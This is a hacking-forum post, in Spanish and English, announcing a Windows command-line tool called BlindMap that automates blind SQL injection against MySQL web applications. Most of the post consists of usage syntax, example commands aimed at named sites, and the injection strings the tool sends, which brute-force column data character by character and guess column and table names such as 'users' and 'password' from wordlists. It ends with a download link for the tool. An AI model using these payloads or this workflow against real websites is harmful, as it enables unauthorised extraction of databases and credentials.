si, ese mismo era.
BlindMap - Advanced SQL Injection By COdebreak
Copiado de la sección privada.
Lo hice público en w4ck1ng, asi que ahora tb lo hago público acá.
(si, esta en ingles)
-------------------------------------------------------------------------Hi,
Here's a little app that I've made the other day.
This application is an automated blind sql injection brute-forcer. The main idea of this tool is the ability to construct custom sql injections (blind or not) and use the power of the brute force. I know there's a lot of blind sql injection tools out there, but all of them (at least the ones I know) have pre made injections to find out specific information, and doesn't give you the freedom to create your own injections with automated process.
With this tool you can create your own injections and use incremental char(n) to find out valuable information and you can even use wordlists to find out common table names, column names and so on.
The app use: ______ _ _ ____ ___
| ___ \ (_) | | \/ |
| |_/ / |_ _ __ __| | . . | __ _ _ __
| ___ \ | | '_ \ / _` | |\/| |/ _` | '_ \
| |_/ / | | | | | (_| | | | | (_| | |_) |
\____/|_|_|_| |_|\__,_\_| |_/\__,_| .__/
| |
|_| Rev.4
~ [ [url]www.codebreak.tk[/url] - codebreak1984 @gmail.com] ~
Blind SQL Mapper - For advanced SQL Injection
Works with all mysql versions. Just desing a valid query.
Coded by: Codebreak (a.k.a Codebreak1984)
Contact: codebreak1984 @gmail.com
-----------------------------------------------------------------------------
Usage: sql.exe -type host path injection check
type:
-column Will try to find valid columns using a wordlist.
-brute Will try to bruteforce your query.
-table Will bruteforce your query with a wordlist.
host: target server (ip or hostname)
path: vulnerable path, including script and variable
injection: a valid mysql query.
-[+] the incremental MID variable, in case of a true query.
-[char] the incremental char numbers to compare the column data.
-[word] You can test words from a wordlist. Nice to find tables.
check: A string shown in a valid query
Examples:
sql.exe -brute "[url]www.injectme.com"[/url] "/guestbook/recorded/show.php?id=1" "+AND+ASCII(MID(column,[+],1))=[char]" "admin data"
sql.exe -column "[url]www.injectme.com"[/url] "/news/news.php?id=1" "Ps3 released!" "wordlist.txt"
sql.exe -table "[url]www.injectme.com"[/url] "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]" "Ps3 released!" "wordlist.txt"
-----------------------------------------------------------------------------
Here's an example:I have a bugged script, and I found out that there's a column called "name", so I want to find data inside that column, asociated to my search query (id=404). This query should work in mysql 3.x.
sql.exe -brute "localhost" "/system/search.php?search=404" "+AND+ASCII(MID(name,[+],1))=[char]" "404"
Where:- Host: localhost.
- Path (and valid query): "/system/search.php?search=404"
- Injection: "+AND+ASCII(MID(name,[+],1))=[char]"
- column: name
- Using [+] and [char] for bruteforcing purpose. ("[+]" increments only when a valid match appears and "[char]" increments until a valid match).
- match: 404 (not for the ID, it's for the results in the picture).
* I know that the data already appears in the picture and there's no point to the injection, is just a POC.This will try:search.php?search=404+AND+ASCII(MID(name,1,1))=76
search.php?search=404+AND+ASCII(MID(name,1,1))=77
search.php?search=404+AND+ASCII(MID(name,2,1))=32
search.php?search=404+AND+ASCII(MID(name,2,1))=33
search.php?search=404+AND+ASCII(MID(name,2,1))=34
search.php?search=404+AND+ASCII(MID(name,2,1))=35
Result:
Another example: mysql 3.xI've found another sql injection, and I want to know
column names by using the following query:
ORDER+BY+column--
So, i'll try with this:sql.exe -column "[url]www.somesite.com"[/url] "/news/news.php?id=1" "Ps3 released!" "wordlist.txt"
Where:- Host: ww.somesite.com
- Path
(and valid query): ""/news/news.php?id=1"
- Match: "Ps3 released!"
- Wordlist: "wordlist.txt"
This will try:news.php?id=1+ORDER+BY+user-
news.php?id=1+ORDER+BY+users--
news.php?id=1+ORDER+BY+pass--
news.php?id=1+ORDER+BY+password--
news.php?id=1+ORDER+BY+passwords--
* When a valid match is found, the app will print the valid column name.
** This is the only query that cannot be modified. It's pre-made.
Another example!: mysql 4.xI've found another sql injection, and I can use "UNION" in the query... so I'll try to find out
table names.
So, i'll try with this:sql.exe -table "[url]www.somesite.com"[/url] "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]" "Ps3 released!" "wordlist.txt"
Where:- Host:
www.somesite.com- Path & Valid
Injection (Nº of columns): "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]"
- Using "[word]" as a variable where the words extracted from the wordlist will be.- Match: "Ps3 released!"
- Wordlist: "wordlist.txt"
* When a valid match is found, the app will print the valid word.Of course they're are just examples, you can make your own valid queries.
The main idea of this app is to have an extra hand in the time when the process could be automated, because as you can see, is not that user friendly and is more like and advanced tool.
You can download it here:http://rapidshare.com/files/30757746/sql.zip.htmlBye!
BlindMap - Advanced SQL Injection By COdebreak
Autor
En línea
- 
